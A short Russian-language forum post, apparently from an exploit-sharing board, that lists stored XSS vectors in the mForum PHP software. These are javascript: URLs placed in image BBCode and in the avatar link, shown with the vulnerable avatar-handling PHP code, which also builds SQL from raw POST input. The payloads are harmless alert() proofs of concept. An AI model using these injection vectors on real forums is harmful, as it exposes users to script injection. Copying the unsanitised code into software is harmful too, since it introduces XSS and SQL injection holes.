10.12.2009, 21:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
mForum
Активная XSS:
1. Создаём топик с [IMG]javascript :alert()[/IMG]
2. usercp.php?mode=edit_profile : Image link = javascript :alert()
Код:
PHP код:
if ($_POST[avatar2] != "" AND $_POST[deleteavatar] == "") {
#THIRDIF#
$len = strlen($_POST[avatar2]) - 4;
$check_ext = substr($_POST[avatar2],$len,strlen($_POST[avatar2]));
if ($check_ext != ".gif" AND $check_ext != ".jpg")
profile_error("$lang[138]");
$_POST[avatar2] = str_replace(">", "", $_POST[avatar2]);
$_POST[avatar2] = str_replace("<", "", $_POST[avatar2]);
$_POST[avatar2] = str_replace("\"", "", $_POST[avatar2]);
if (strlen($_POST[avatar2]) > 200 OR strlen($_POST[avatar2]) < 7)
profile_error("$lang[140]");
$query_av = "UPDATE $table_users SET avatar=\"$_POST[avatar2]\" WHERE id=\"$_SESSION[user_id]\" LIMIT 1";
if (mysql_query($query_av,$db))
print "<li>$lang[141]</li>";
#THIRDIF#
}
3. post.php?mode=pvt [IMG]javascript :alert()[/IMG]
|
|
|